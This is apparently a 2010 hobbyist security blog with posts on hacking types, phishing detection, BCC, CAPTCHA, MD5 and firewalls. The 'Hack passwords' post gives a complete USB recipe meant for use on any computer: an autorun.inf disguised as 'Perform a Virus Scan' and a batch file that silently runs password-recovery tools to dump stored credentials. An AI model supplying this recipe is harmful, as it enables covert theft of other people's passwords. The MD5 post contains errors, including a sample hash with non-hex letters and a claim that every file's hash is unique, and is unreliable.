Search This Blog

Thursday, September 30, 2010

+ Hacking Types


There are many types of HACKING, I wise to say some of them and they do…..

1)Trojan Horses:
Trojan Horses is the best and easy way of get break-in to your PC. Usually hacker send a trojan by BINDING it with other genuine program , By this it will try to hide from your Anti-virus.
When the user opens the program, trojan executes first and opens BACKDOOR for the Hacker…

2) Viruses and Worms:
Viruses and worms are self-replicating programs or code fragments that attach themselves to other programs (viruses) or machines (worms). Both viruses and worms attempt to shut down networks by flooding them with massive amounts of bogus traffic, usually through e-mail.

3) Back Doors:
Hackers can gain access to a network by exploiting back doors ‘administrative shortcuts, configuration errors, easily deciphered passwords, and unsecured dial-ups. With the aid of computerized searchers (bots), hackers can probably find any weakness in your network…

4) Rogue Access Points:
Rogue access points (APs) are unsecured wireless access points that outsiders can easily breech..

5) Denial of Service:
DoS attacks give hackers a way to bring down a network without gaining internal access. DoS attacks work by flooding the access routers with bogus traffic (which can be e-mail or Transmission Control Protocol, TCP, packets).

Distributed DoSs (DDoS5) are coordinated DoS attacks from multiple sources. A DDoS is more difficult to block because it uses multiple, changing, source IP addresses.

6) Anarchists, Crackers, and Kiddies:
Who are these people, and why are they attacking I your network?
Anarchists are people who just like to break stuff. They usually exploit any target of opportunity.

Crackers are hobbyists or professionals who break passwords and develop Trojan horses or other SW (called warez). They either use the SW themselves (for bragging rights) or sell it for profit.

Script kiddies are hacker wannabes. They have no real hacker skills, so they buy or download warez, which they launch.

Other attackers include disgruntled employees, terrorists, political operatives, or anyone else who feels slighted, exploited, ripped off, or unloved.

7) Sniffing and Spoofing:
Sniffing refers to the act of intercepting TCP packets. This interception can happen through simple eavesdropping or something more sinister.

Spoofing is the act of sending an illegitimate packet with an expected acknowledgment (ACK), which a hacker can guess, predict, or obtain by snooping.

And there are many more type which we discus later…….
Posted by at No comments:

+ Hack passwords

Here is a small trick with which you can sniff passwords stored in a computer.To do so you need some Utilities…..

Description

MessenPass is a password recovery tool that reveals the passwords of the following instant messenger applications:
  • MSN Messenger
  • Windows Messenger (In Windows XP)
  • Windows Live Messenger (In Windows XP/Vista/7)
  • Yahoo Messenger (Versions 5.x and 6.x)
  • Google Talk
  • ICQ Lite 4.x/5.x/2003
  • AOL Instant Messenger v4.6 or below, AIM 6.x, and AIM Pro.
  • Trillian
  • Trillian Astra
  • Miranda
  • GAIM/Pidgin
  • MySpace IM
  • PaltalkScene
  • Digsby
MessenPass can only be used to recover the passwords for the current logged-on user on your local computer, and it only works if you chose the remember your password in one of the above programs.

PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser.

Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer. The passwords are revealed by reading the information from the Protected Storage.

IE PassView is a small password management utility that reveals the passwords stored by Internet Explorer Web browser, and allows you to delete passwords that you don’t need anymore. It supports all versions of Internet Explorer, from version 4.0 and up to 8.0.

Mail PassView is a small password-recovery tool that reveals the passwords and other account details for the following email clients:
  • Outlook Express
  • Microsoft Outlook 2000 (POP3 and SMTP Accounts only)
  • Microsoft Outlook 2002/2003/2007/2010 (POP3, IMAP, HTTP and SMTP Accounts)
  • Windows Mail
  • Windows Live Mail
  • IncrediMail
  • Eudora
  • Netscape 6.x/7.x (If the password is not encrypted with master password)
  • Mozilla Thunderbird (If the password is not encrypted with master password)
  • Group Mail Free
  • Yahoo! Mail – If the password is saved in Yahoo! Messenger application.
  • Hotmail/MSN mail – If the password is saved in MSN/Windows/Live Messenger application.
  • Gmail – If the password is saved by Gmail Notifier application, Google Desktop, or by Google Talk.
HOW TO DO IT>>
1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.
ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save the Notepad and rename it from
New Text Document.txt to autorun.inf
Now copy the autorun.inf file onto your USB pendrive.

3. Create another Notepad and write the following text onto it.
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
save the Notepad and rename it from
New Text Document.txt to launch.bat

Copy the launch.bat file also to your USB drive.
Now your rootkit is ready and you are all set to sniff the passwords. You can use this pendrive on on any computer to sniff the stored passwords. Just follow these steps

1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).
2. In the pop-up window, select the first option (Perform a Virus Scan).
3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.
4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.

This hack works on Windows 2000, XP, Vista and Windows 7

NOTE: This procedure will only recover the stored passwords (if any) on the Computer.
Posted by at No comments:

+ What is Phishing..?

In common Phishing is a fraudulent attempt, usually made through email, to steal your personal information.
Phishing emails usually appear to come from a well-known organization and ask for your personal information — such as credit card number, social security number, account number or password. Often times phishing attempts appear to come from sites, services and companies with which you do not even have an account.



       HOW TO DETECT PHISHING:
Its very easy if you are careful and its also very hard if you are not…
  1. Generic greeting. Phishing emails are usually sent in large batches. To save time, Internet criminals use generic names like “First Generic Bank Customer” so they don’t have to type all recipients’ names out and send emails one-by-one. If you don’t see your name, be suspicious.
  2. Forged link. Even if a link has a name you recognize somewhere in it, it doesn’t mean it links to the real organization. Roll your mouse over the link and see if it matches what appears in the email. If there is a discrepency, don’t click on the link. Also, websites where it is safe to enter personal information begin with “https” — the “s” stands for secure. If you don’t see “https” do not proceed.
  3. Requests personal information. The point of sending phishing email is to trick you into providing your personal information. If you receive an email requesting your personal information, it is probably a phishing attempt.
  4. Sense of urgency. Internet criminals want you to provide your personal information now. They do this by making you think something has happened that requires you to act fast. The faster they get your information, the faster they can move on to another victim.
here is a small example of phishing
and like this also
www.micosoft.com
www.mircosoft.com
www.verify-microsoft.com
instead of www.microsoft.com

How to identify a fraudulent e-mail?
Here are a few phrases to look for if you think an e-mail message is a phishing scam.

“Verify your account.”
Legitimate sites will never ask you to send passwords, login names, Social Security numbers, or any other personal information through e-mail.

“If you don’t respond within 48 hours, your account will be closed.”
These messages convey a sense of urgency so that you’ll respond immediately without thinking.

“Dear Valued Customer.”
Phishing e-mail messages are usually sent out in bulk andoften do not contain your first or last name.

“Click the link below to gain access to your account.”
HTML-formatted messages can contain links or forms that you can fill out just as you’d fill out a form on a Web site. The links that you are urged to click may contain all or part of a real company’s name and are usually “masked,” meaning that the link you see does not take you to that address but somewhere different, usually a scam Web site.

Notice in the following example that resting the mouse pointer on the link reveals the real Web address, as shown in the box with the yellow background. The string of cryptic numbers looks nothing like the company’s Web address, which is a suspicious sign.

So the Bottom line to defend from phishing attack is
1. Never assume that an email is valid based on the sender’s email address.
2. A trusted bank/organization such as paypal will never ask you for your full name and password in a PayPal email.
3. An email from trusted organization will never contain attachments or software.
4. Clicking on a link in an email is the most insecure way to get to your account.
Posted by at No comments:

+ How To Use BCC Email Field

What is BCC?
BCC, which stands for blind carbon copy, allows you to hide recipients in email messages. Unlike addresses in the To: field or the CC: (carbon copy) field, addresses in the BCC: field cannot be seen by other users.

Why would you want to use BCC?

There are a few main reasons for using BCC:
Privacy – Sometimes it’s beneficial, even necessary, for you to let recipients know who else is receiving your email message. However, there may be instances when you want to send the same message to multiple recipients without letting them know who else is receiving the message. If you are sending email on behalf of a business or organization, it may be especially important to keep lists of clients, members, or associates confidential. You may also want to avoid listing an internal email address on a message being sent to external recipients.

Another point to remember is that if you use the To: or CC: fields to list all of your recipients, these same recipients will also receive any replies to your message unless the sender removes them. If there is potential for a response that is not appropriate for all recipients, consider using BCC.

Tracking – Maybe you want to access or archive the email message you are sending at another email account. Or maybe you want to make someone, such as a supervisor or team member, aware of the email without actually involving them in the exchange. BCC allows you to accomplish these goals without advertising that you are doing it.

Respect for your recipients – Forwarded email messages frequently contain long lists of email addresses that were CC’d by previous senders. These addresses are highly likely to be active and valid, so they are very valuable to spammers. Furthermore, many email-borne viruses harvest email addresses contained in messages you’ve already received (not just the To: and From: fields, but from the body, too), so those long lists in forwarded messages pose a risk to all the accounts they point to if you get infected.

Many people frequently forward messages to their entire address books using CC. Encourage people who forward messages to you to use BCC so that your email address is less likely to appear in other people’s inboxes and be susceptible to being harvested. To avoid becoming part of the problem, in addition to using BCC if you forward messages, take time to remove all existing email addresses within the message. The additional benefit is that the people you’re sending the message to will appreciate not having to scroll through large sections of irrelevant information to get to the actual message.

How do you BCC an email message?

Most email clients have the option to BCC listed a few lines below the To: field. However, sometimes it is a separate option that is not listed by default. If you cannot locate it, check the help menu or the software’s documentation.

If you want to BCC all recipients and your email client will not send a message without something in the To: field, consider using your own email address in that field. In addition to hiding the identity of other recipients, this option will enable you to confirm that the message was sent successfully.
Posted by at No comments:

+ What is CAPTCHA and How it works…?

INTRODUCTION

CAPTCHA or Captcha (pronounced as cap-ch-uh) which stands for “Completely Automated Public Turing test to tell Computers and Humans Apart” is a type of challenge-response test to ensure that the response is only generated by humans and not by a computer.

In simple CAPTCHA is a word verification test to tell that you are a human and not any BOTS.You can see CAPTCHA test all most all SING-UP forms,FORUM,and also some times requsted while you submit COMMENTS and etc….,

What Purpose does CAPTCHA Exactly?
The purpose of CAPTCHA is mainly to stop activitys form BOTS(automated softwares)…

Thus you have to prove that you are a human before you SING-UP or etc….,

WHY SHOULD THEY STOP BOTS (automated softwares)?

As it is said BOTS are AUTOMATED SOFTWARES which will send unlimited requests(for sing-up or comments or etc…,) to the destined server and crash the server,Thus the real users cannot not get the access to that SITE or FORUM.Thus CAPTCHAs can be deployed to protect systems that are vulnerable to email spam, such as the services from Gmail, Yahoo and Hotmail…
        CHARACTERISTIC
A CAPTCHA is a means of automatically generating new challenges which:
  • Current software is unable to solve accurately.
  • Most humans can solve
  • Does not rely on the type of CAPTCHA being new to the attacker.CAPTCHAs are implemented by presenting users with an image which contains distorted or randomly stretched characters which only humans should be able to identify. Sometimes characters are striked out or presented with a noisy background to make it even more harder for computers to figure out the patterns.
Although a checkbox “check here if you are not a bot” might serve to distinguish between humans and computers, it is not a CAPTCHA because it relies on the fact that an attacker has not spent effort to break that specific form. (Such ‘check here’ methods are very easy to defeat.) Instead, CAPTCHAs rely on difficult problems in artificial intelligence. In the short term, this has the benefit of distinguishing humans from computers.

As it is said CAPTCHAs are not only visual test,in other words there are many methods like
Asking an mathematical equation like 1+1=?

OR
A user is presented with 4 images in which 3 contains picture of LIONS and one contain a CHEETAH. The user is asked to select only those images which contain animals in them. This Turing test can easily be solved by any human, but almost impossible for a computer.

OR
Asking some “common sense” questions (“what color is the sky on a clear day”) and given some options below which may scramble the options each time.

Breaking the CAPTCHA

However there is no universal algorithm that could pass through and break any CAPTCHA system and hence each CAPTCHA algorithm must have to be tackled individually. It might not work 100 percent of the time, but it can work often enough to be worthwhile to spammers.
There are a few approaches to defeating CAPTCHAs:
  • exploiting bugs in the implementation that allow the attacker to completely bypass the CAPTCHA,
  • improving character recognition software, or
  • using cheap human labor to process the test.
Posted by at No comments:

+ What is MD5 hash..?

MD5 hash…. I think you all had listen this word more often,but most of them dont’t know what is it and why is it….

OK i am not going to the detailed information of MD5 because it is somewhat hard to understand,rather than i will say its usage in daily life..

In cryptography, MD5 (Message-Digest algorithm 5) is a widely used cryptographic hash function with a 128-bit hash value. MD5 has been employed in a wide variety of security applications, and is also commonly used to check the integrity of files. …

This MD5 algorithm is developed by RSA Data Security, Inc.,

MD5 is a one-way hash algorithm that takes any length of data and produces a 128 bit “fingerprint” or “message digest”. This fingerprint is “non-reversible”.

Now lets check out the use of MD5 hash with an example..

Lets Suppose i had a kept my ‘back up’ of my pc on a ‘file sharing site’ and i intended to download it for some rezone after some days..

I had successfully downloaded that ‘back up’ file and deleted that file in my ‘ONLINE FILE SHARING ACCOUNT’

Now i tried to install that “back up”,but it wont install(saying there is a error)

Why it happened like that…There may be many reasons for it,like “instability of internet,due to hackers,due to download managers,The file can be tampered due to virus infections,etc…,”

what ever the resone is,I lost my “back up”….

Here come the MD5 hash..

Every file comes with a MD5 hash string.A MD5 hash is nothing but a 32 digit hexadecimal number which can be something as follows

” e25f2d85g2fjet22f52d22f5e5f8a8dj “

This hash is unique for every file irrespective of it’s size and type. That means two files with the same size will not have the same MD5 hash even though they are of same type and size. So MD5 hash can be used to uniquely identify a file.

How to use MD5 hash to check integrity of files..?

Before you download a file first check the “MD5 hash” of that file on the server(you have many online site for it and also many free MD5 programs).Note down the hash and after the file has been downloaded again check the MD5 hash of that file.If the two are same the file is not corrected and the file is in right condition,if the two are not the same then it is ****

I hope this helps, PASS YOUR COMMENTS
Posted by at No comments:

+ What is a FIREWALL ?

A firewall is a part of a computer system or network that is designed to block unauthorized access while permitting authorized communications. It is a device or set of devices which is configured to permit or deny computer applications based upon a set of rules and other criteria.

Firewalls can be implemented in either hardware or software, or a combination of both. Firewalls are frequently used to prevent unauthorized Internet users from accessing private networks connected to the Internet, especially intranets. All messages entering or leaving the intranet pass through the firewall, which examines each message and blocks those that do not meet the specified security criteria.

There are several types of firewall techniques:

1.Packet filter: Packet filtering inspects each packet passing through the network and accepts or rejects it based on user-defined rules. Although difficult to configure, it is fairly effective and mostly transparent to its users. It is susceptible to IP spoofing.

2.Application gateway: Applies security mechanisms to specific applications, such as FTP and Telnet servers. This is very effective, but can impose a performance degradation.

3.Circuit-level gateway: Applies security mechanisms when a TCP or UDP connection is established. Once the connection has been made, packets can flow between the hosts without further checking.

4.Proxy server: Intercepts all messages entering and leaving the network. The proxy server effectively hides the true network addresses.

FUNCTION

A firewall is a dedicated appliance, or software running on a computer, which inspects network traffic passing through it, and denies or permits passage based on a set of rules/criteria.

It is normally placed between a protected network and an unprotected network and acts like a gate to protect assets to ensure that nothing private goes out and nothing malicious comes in.

A firewall’s basic task is to regulate some of the flow of traffic between computer networks of different trust levels. Typical examples are the Internet which is a zone with no trust and an internal network which is a zone of higher trust. A zone with an intermediate trust level, situated between the Internet and a trusted internal network, is often referred to as a “perimeter network” or Demilitarized zone (DMZ).

A firewall’s function within a network is similar to physical firewalls with fire doors in building construction. In the former case, it is used to prevent network intrusion to the private network. In the latter case, it is intended to contain and delay structural fire from spreading to adjacent structures.
Posted by at No comments:
Subscribe to: Posts (Atom)